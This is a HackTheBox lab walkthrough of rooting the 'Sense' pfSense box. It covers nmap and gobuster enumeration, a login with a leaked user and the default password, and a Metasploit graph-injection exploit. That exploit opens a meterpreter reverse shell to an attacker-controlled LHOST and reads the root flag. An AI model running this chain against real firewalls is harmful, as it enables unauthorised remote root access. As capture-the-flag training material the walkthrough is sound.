Sense HackTheBox WalkThrough
This is Sense HackTheBox machine walkthrough and is also the
18th machine of our
OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to
Sense HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a
FreeBSD OS machine with IP address
10.10.10.60 and difficulty
easy assigned by its maker.
Since this machine is
retired on HackTheBox platform so you will require
VIP subscription to access this machine. So first of all connect your Kali/Parrot machine with
HackTheBox VPN and confirm your connectivity with this machine by pinging its IP address 10.10.10.60. If all goes correct then start hacking.
As usual I started by scanning the machine with
Nmap. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-
$ nmap -sC -sV -oA nmap/sense 10.10.10.60
$ cat nmap/sense.nmap
Nmap found port
443 as open. Let us enumerate on these ports.
Lighttpd 1.4.35 web server is running on port 80. Let us export our
sense.xml file which is created by nmap’s switch
$searchsploit (tool to query exploit-db offline) to check for available exploits on
Searching Available Exploits
$ searchsploit --nmap nmap/sense.xml
Searchsploit found multiple exploits for
Lighttpd. But for our current version no suitable exploit is present. Since web server is running on port 80 and 443 so there must be some website/s running over the URLs http://10.10.10.60 and https://10.10.10.60. Ongoing to the URL http://10.10.10.60 got redirected to https://10.10.10.60. Found a
login page of
PFsense (pfSense is an open source firewall/router computer software distribution based on FreeBSD).
Since it is a login page of a well-known web application so as usual my next step is to login with some default credential like
kfsense because sometimes admin forget to update default credential of the application. Did the same this time too but none of them worked. Checked the
page-source by clicking
CTRL+U for some type of hint but found nothing interesting. So nothing left except directory bruteforcing and fuzzing.
Then performed directory bruteforcing on URL https://10.10.10.60/ using
$gobuster (directory bruteforcer) along with extension
txt and wordlist
directory-list-2.3-medium.txt (this wordlist can be found in
Performing Directory Bruteforcing
$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -u https://10.10.10.60 -n -x txt -t 50 -s 200
Directory bruteforcing found two
system-users.txt. On visiting system-users.txt at http://10.10.10.60/system-users.txt found some information about username and password.
Rohit and password is pointing to default password of the company. After some googling, found that the default password of pfsense is pfsense. When I tried to login with the credential
pfsense at https://10.10.10.60/ got login successful. The installed version of pfsense is
Soon I get information about any application and its version then my next step is to search it over internet for available vulnerability and its exploit. This time I have used
Exploit Search Engine https://sploitus.com . It listed multiple
authenticated RCE exploits and there is also a metasploit module present. After searching pfsense in metasploit I found
exploit/unix/http/pfsense_graph_injection_exec module which worked and get me shell. There are also other ways to exploit this vulnerability without metasploit. You can
mirror the exploit from exploit-db using
$searchsploit by the command
$ searchsploit -m php/webapps/43560.py or download it from Packetstormsecurity website.
Let us get user shell using Metasploit.
Getting User Shell
msf6 > search pfsense
msf6 > use exploit/unix/http/pfsense_graph_injection_exec
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PASSWORD pfsense
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have got a shell and that too with root user privilege which means we don’t have to perform
Privilege Escalation which we used to do. Root user is just like God in
UNIX like OS. Let us capture user and root flag.
Capture User Flag
meterpreter > cat /home/rohit/user.txt
Capture Root Flag
meterpreter > cat /root/root.txt
This was how I rooted to Pfsense HackTheBox machine. Hope you have got something to learn from this machine walkthrough. Feel free to ask your doubt in the comment section if you face any. Thanks for reading this article. For any query and suggestion related to walkthrough contact us at [email protected].